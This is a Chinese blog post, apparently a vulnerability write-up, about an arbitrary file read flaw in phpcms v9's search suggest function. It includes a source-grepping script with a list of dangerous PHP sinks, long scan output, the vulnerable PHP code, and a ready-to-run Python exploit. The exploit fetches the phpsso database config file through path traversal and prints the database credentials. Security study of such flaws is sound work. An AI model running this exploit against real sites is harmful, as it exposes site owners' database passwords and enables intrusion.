`

phpcms v9 爆密码

 
阅读更多

   1.首先是http://www.wooyun.org/bugs/wooyun-2010-010072

      有人报告phpcms v9 直接爆密码

    开始我还比较迷惑,因为我记得我看过phpcms v9 的管理员密码体系是有salt的,光爆密码没啥用啊?

 

  2.后面有人指出了是和前一个http://www.wooyun.org/bugs/wooyun-2010-09463的补充

      我记得这个漏洞开始报的是一个xss,实质则是一个file_get_contents的问题,就变成了任意文件浏览的问题

 

3  下来就是如何构造和如何找的问题了,

     我先利用了pfind 查找file_get_contents,得到如下结果:

#/usr/bin/python
import os
from sys import argv

class pfind:
    #hm=open("123.htm","r+")
    allfile=[]
    allpt=[]
    fun=["$_REQUEST","$_GET","$_POST","$_FILE","fput","fread","fwrite","file_get_contents","file_put_contents"]
    #fun=["include","include_once","require","require_once","show_source"]
    #fun=["eval","preg_replace+/e","assert","call_user_func","call_user_func_array","create_function"]
    #fun=["get_rid"]
    #fun=["select ","update","insret","$_SERVER","$_POST","$_COOKIE","$_REQUEST","$_FILES","$_ENV","$_HTTP_COOKIE_VARS","$_HTTP_ENV_VARS","$_HTTP_GET_VARS","$_HTTP_POST_FILES","$_HTTP_POST_VARS","$_HTTP_SERVER_VARS","system","exec","passthru","shell_exec","popen","proc_open","eval","assert","fwrite","fput","fread","file_put_contents","move_uploaded_file"]
    def getfl (self,fl):
        for i in os.listdir(fl):
            if os.path.isdir(fl+"\\"+i)==True:                
                ft=fl+"\\"+i
                self.getfl(ft)
            elif os.path.isfile(fl+"\\"+i)==True:
                self.findfun(fl+"\\"+i)
               # self.allfile.append(fl+"\\"+i)
    def findfun (self,fl):
        ln=1
        try:
            fl.split(".php")
        except:
            exit
        
        fp=open(fl,"r+")
        while True:
            line=fp.readline()
            if line:
                x=0
                while x< len(self.fun):
                    if self.fun[x] in line :
                        #print 
                        
                        print "[+] File: "+fl
                        print "[+] Line: "+str(ln)
                        print "[+] Have: "+self.fun[x]
                        print "[+] Code: "+line
                        
                    x=x+1

            else:
                break
            ln=ln+1
    def vfind (self,fl,val):
        ln=1
        fp=open(fl,"r+")
        while True:
            line=fp.readline()
            if line:
                if val in line:
                    print "[+] File: "+fl
                    print "[+] Have: "+val
                    print "[+] Line: "+str(ln)
                    print "[+] Code: "+line
            else:
                break
#'''
try:
    c=argv[1]
    if c=="-p":
        a=pfind()
        a.getfl(argv[2])
    elif c=="-f":
        a=pfind()
        a.fun=[argv[3]]
        a.getfl(argv[2])         
except:
    print "[+] Code By Cond0r QQ 707447667"
    print "[+] Blog Pythoner.blog.com"
    print "[+] usage: "+argv[0]+" -p c:\\1\\"
    print "[+] usage: "+argv[0]+" -f c:\\1\\  $value"
    #'''
#a=pfind()
#a.vfind("D:\DTServer\www\\22\\admin_permissions.php","a")
 

  写道

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $license = file_get_contents(PHPCMS_PATH."install/license.txt");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 78
[+] Have: file_get_contents
[+] Code: $returnid = @file_get_contents($remote_url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 216
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 276
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 330
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/testsql.sql");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 468
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 484
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\cache_file.class.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\ip_area.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $data = $xml->xml_unserialize(@file_get_contents($api_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 34
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 55
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 143
[+] Have: file_get_contents
[+] Code: $str .= '$json = @file_get_contents(\''.$datas['url'].'\');';

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 150
[+] Have: file_get_contents
[+] Code: $str .= '$xml_data = @file_get_contents(\''.$datas['url'].'\');';

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\dir.func.php
[+] Line: 75
[+] Have: file_get_contents
[+] Code: file_put_contents($v, iconv($in_charset, $out_charset, file_get_contents($v)));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1561
[+] Have: file_get_contents
[+] Code: function pc_file_get_contents($url, $timeout=30) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1563
[+] Have: file_get_contents
[+] Code: return @file_get_contents($url, 0, $stream);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 262
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 266
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 383
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MEMBER_MODEL_PATH.'member_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 387
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MEMBER_MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\card.class.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents(self::$server_url.$url)) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 42
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->installdir.$m.'.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 52
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 182
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->uninstalldir.$m.'.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 320
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 329
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\functions\global.func.php
[+] Line: 49
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\index.php
[+] Line: 288
[+] Have: file_get_contents
[+] Code: $snda_res_json = @file_get_contents($snda_check_url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 44
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 230
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_applist&s='.$s.'&p='.$p);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 233
[+] Have: file_get_contents
[+] Code: $recommed_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_recommed_applist&s=5&p=1');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 236
[+] Have: file_get_contents
[+] Code: $focus_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_app_focus&num=3');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 252
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 268
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 337
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 377
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\cnzz\index.php
[+] Line: 22
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents('http://wss.cnzz.com/user/companion/phpcms.php?domain='.APP_PATH.'&key='.$key.'&cms=phpcms')) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\classes\collection.class.php
[+] Line: 218
[+] Have: file_get_contents
[+] Code: if (!empty($url) && $html = @file_get_contents($url)) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\node.php
[+] Line: 154
[+] Have: file_get_contents
[+] Code: $data = json_decode(base64_decode(file_get_contents($filename)), true);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 135
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 139
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 195
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 206
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 26
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'formguide_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 30
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\formguide.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $create_sql = file_get_contents(MODEL_PATH.'create.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'member_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 32
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\OauthSDK.class.php
[+] Line: 578
[+] Have: file_get_contents
[+] Code: @file_get_contents($url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 47
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 58
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 107
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 133
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 201
[+] Have: file_get_contents
[+] Code: $res = @file_get_contents($url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\file.php
[+] Line: 82
[+] Have: file_get_contents
[+] Code: $data = htmlspecialchars(file_get_contents($filepath));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 8
[+] Have: file_get_contents
[+] Code: $data = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $data = @file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 65
[+] Have: file_get_contents
[+] Code: $template_bak_db->insert(array('creat_at'=>SYS_TIME,'fileid'=>$style."_".$dir."_".$filename, 'userid'=>param::get_cookie('userid'), 'username'=>param::get_cookie('admin_username'), 'template'=>new_addslashes(file_get_contents($filepath))));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\style.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: $code = json_decode(base64_decode(file_get_contents($filename)), true);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $pathlist_str = @file_get_contents($upgrade_path_base);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 69
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 99
[+] Have: file_get_contents
[+] Code: if (strtolower(substr($file_list[$fk], -3, 3)) == 'sql' && $data = file_get_contents($file_list[$fk])) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 131
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($menu_lan_file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 187
[+] Have: file_get_contents
[+] Code: $phpcms_md5 = @file_get_contents($this->_upgrademd5.$current_version['pc_release'].'_'.CHARSET.".php");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\api\uc.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $post = xml_unserialize(file_get_contents('php://input'));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\cache_file.class.php
[+] Line: 74
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 27
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 43
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\applications.php
[+] Line: 156
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents($url.'code='.urlencode($param))) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\system.php
[+] Line: 56
[+] Have: file_get_contents
[+] Code: $html = file_get_contents($filepath);

 

非常多的file_get_contents,然后找到了有漏洞的在\phpcms\modules\search\index.php 下面的203行如下

	public function public_get_suggest_keyword() {
		#echo 'ice test';
		$url = $_GET['url'].'&q='.$_GET['q'];
		#echo $url ;
		$res = @file_get_contents($url);
		#echo $res;
		if(CHARSET != 'gbk') {
			$res = iconv('gbk', CHARSET, $res);
		}
		echo $res;
	}

 可以看到这里直接对url和q进行了拼接即: url+'&q='+q这种样子然后去file_get_content

 

然后就找可以利用的地方:

依然利用pfind,查找public_get_suggest_keyword,得到了如下代码

 

 写道
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 198
[+] Have: public_get_suggest_keyword
[+] Code: public function public_get_suggest_keyword() {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\statics\js\search_suggest.js
[+] Line: 2
[+] Have: public_get_suggest_keyword
[+] Code: $("#q").suggest("?m=search&c=index&a=public_get_suggest_keyword&url="+encodeURIComponent('http://www.google.cn/complete/search?hl=zh-CN&q='+$("#q").val()), {

可以识别出是第二个就是调用这个危险方法的地方,可以抽取出来,也是比较直接的可以控制url和q参数,下来就是怎么构造本地文件路径的问题,由于存在&q=的问题,我陷入了误区不知如何绕过,然后看了疯子的exe,倒是解决了这个问题但原因不详....

 

 

最终写出了poc来

#! /usr/bin/env python
#coding=utf-8

"""
这个py脚本是针对phpcms v9 的配置文件的,具体功能简单粗暴
参考了乌云 http://www.wooyun.org/bugs/wooyun-2010-010072
以及 疯子blog的东西

Code By icefish
"""
from sys import argv
import urllib2
import re
def run(url):
    url=url+'/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php'
    print '\n\n***********get DataBase Password:*************\n'
    print url
    req = urllib2.Request(url)   
    resp = urllib2.urlopen(req) 
    info=resp.read()
    s=info.replace('	','')
    s=re.sub(r'<\?php\s*return\s*array\s*\(', '', s)
    s=re.sub(r'>', '', s,re.S)
    print '\n\n***********Get the Config.php****************'
    print s
    
    return info
    
if __name__=='__main__':
    try:
       
        url=argv[1]
        
        if url!=None:
            run(url)
    except:
        print "[+] Code By icefish WeiBo http://weibo.com/u/1703624267"
        print "[+] Blog http://wcf1987.iteye.com/"
        print "[+] usage: "+argv[0]+" http://www.test.com/"
        
        
        
    
 

 

 

 

实际危害上,如果数据库没开外连,我觉得似乎没什么大危险吧....个人看法,

 

 

 

 

 

 

分享到:
评论

相关推荐

    phpcms v9 购物车+商品模块+订单 最新V9商城插件

    《phpcms v9 购物车+商品模块+订单 最新V9商城插件详解》 在电子商务领域,一个完善的在线购物系统是至关重要的,它涵盖了从商品展示到交易完成的全过程。phpcms v9作为一款强大的内容管理系统,其最新的V9商城插件...

    PHPCMS V9留言板2.2 [10月26号更新]

    PHPCMS V9是一款流行的开源内容管理系统,专为构建企业网站和新闻资讯平台而设计。这个系统的最新更新,即“PHPCMS V9留言板2.2”,是在2010年10月26日发布,主要针对系统中留言板功能进行了一些关键性的改进。 在...

    phpcms v9 帮助手册

    《phpcms v9 帮助手册》是针对phpcms v9内容管理系统的一款详细文档,旨在为用户在无网络环境下提供离线查阅支持。这款手册包含了丰富的知识内容,覆盖了系统的各个方面,对于开发者和运维人员来说是不可或缺的参考...

    PHPCMS V9 表单向导数据导出为EXCEL 插件

    PHPCMS V9 是一款流行的开源内容管理系统,其表单向导功能允许用户自定义创建各种表单,用于收集和管理网站用户的数据。这个“表单向导数据导出为EXCEL 插件”则是专门为PHPCMS V9 设计的一个扩展工具,旨在帮助管理...

    PHPCMS V9 UTF8

    以下是关于PHPCMS V9 UTF8的一些核心知识点: 1. **UTF8编码**:UTF8是一种广泛使用的Unicode字符编码,能够支持世界上大部分语言的字符显示,包括中文、英文、日文等,使得PHPCMS V9可以在全球范围内提供服务。 2...

    PHPCMS V9用户手册

    PHPCMS V9是一款流行的开源内容管理系统,专为网站建设和管理设计。该系统以其强大的功能、易用性和灵活性而受到广大开发者的欢迎。本用户手册是针对PHPCMS V9的二次开发文档,旨在帮助开发者深入理解系统架构,进行...

    PHPCMS V9应用程序

    以下将详细阐述PHPCMS V9的相关知识点。 首先,PHPCMS V9的核心特性之一是其安装流程的便捷性。安装程序设计简洁明了,用户只需按照向导提示,即可快速完成服务器环境配置、数据库连接设置以及网站基本参数的设定。...

    phpcms v9 官方教程全集PPT版打包下载,共10个课时.rar

    phpcms v9 官方教程全集打包下载 第一课时:PHPCMS V9 系统设置 第二课时:PHPCMS V9 使用指南及二次开发向导 第三课时:PHPCMS V9 短消息与新闻心情 第四课时:PHPCMS V9 友情链接与投票 第五课时:PHPCMS V9 ...

    PHPCMS V9多功能地图插件

    【PHPCMS V9多功能地图插件】是一个专为PHPCMS内容管理系统设计的扩展插件,它提供了多接口地图标注功能,使用户能够在不同版本的PHPCMS V9系统中方便地集成地图服务。这款插件的核心特性是支持多种地图服务商的接入...

    phpcms v9二次开发文档资料汇总

    模块【标签】参考手册.(第一版),PHPCMS V9 产品开发权威指南,phpcms_v9_代码分析(一、二、三),phpcms_v9_二次开发及标签制作讲义,PHPCMS_V9安装教程,PHPCMS_V9帮助中心,PHPCMS_V9开发文档,PHPCMS_V9模板制作...

    PHPCMS V9留言板插件2.1 UTF-8版

    PHPCMS V9是一款流行的开源内容管理系统,以其强大的功能和灵活的扩展性受到众多网站开发者喜爱。该系统基于PHP语言开发,并支持多种数据库,如MySQL,提供了一个高效且易用的后台管理界面。"PHPCMS V9留言板插件2.1...

    PHPCMS V9 数据结构

    在深入理解PHPCMS V9的数据结构之前,我们需要先了解一些基本概念。 1. **数据库设计**:PHPCMS V9的核心在于其数据库设计,它使用MySQL作为主要的数据库管理系统。数据库设计包括了表的创建、字段定义、索引设置等...

    PHPCMS V9 修改flash上传为H5上传方案 webuploader.tpl.php

    PHPCMS V9 修改flash上传为H5上传方案

    phpcms v9 资源管理系统

    "v9"代表这是phpcms的第九个主要版本,通常每个新版本都会带来性能优化、安全增强以及新特性的引入。 1. **PHP语言基础**:phpcms v9是用PHP编程语言编写的,PHP是一种开源的服务器端脚本语言,特别适合Web开发,...

    phpcms_V9开发文档

    《PHPCMS V9 开发详解》 PHPCMS V9 是一款强大的内容管理系统,专为网站开发设计,尤其适合新闻、文章、门户类站点。本文档将详细解析其核心特性、开发流程以及目录结构,旨在帮助开发者快速理解和掌握PHPCMS V9的...

    PHPCMS V9 分类信息模型正式版 UTF8.zip

    《PHPCMS V9 分类信息模型:打造高效的生活信息发布平台》 PHPCMS V9 是一款基于PHP语言和MySQL数据库开发的内容管理系统,以其强大的功能和灵活的扩展性,在网站建设领域备受青睐。其中,分类信息模型是PHPCMS V9 ...

    PhpCMS V9代码生成器

    **PhpCMS V9代码生成器**是一款专为PhpCMS V9内容管理系统设计的强大工具,它极大地简化了开发者在创建和管理网站模板时的工作流程。这款软件的主要目标是提高开发效率,减少手动编写代码的时间,让开发者能够更专注...

    PHPCMS V9 修改flash上传为H5上传方案

    本方案旨在将PHPCMS V9 的原始Flash上传功能修改为H5上传,以适应现代浏览器的需求。 首先,我们需要了解Flash上传和H5上传的区别。Flash上传是基于Adobe Flash技术实现的文件上传功能,但在一些现代设备和浏览器中...

Global site tag (gtag.js) - Google Analytics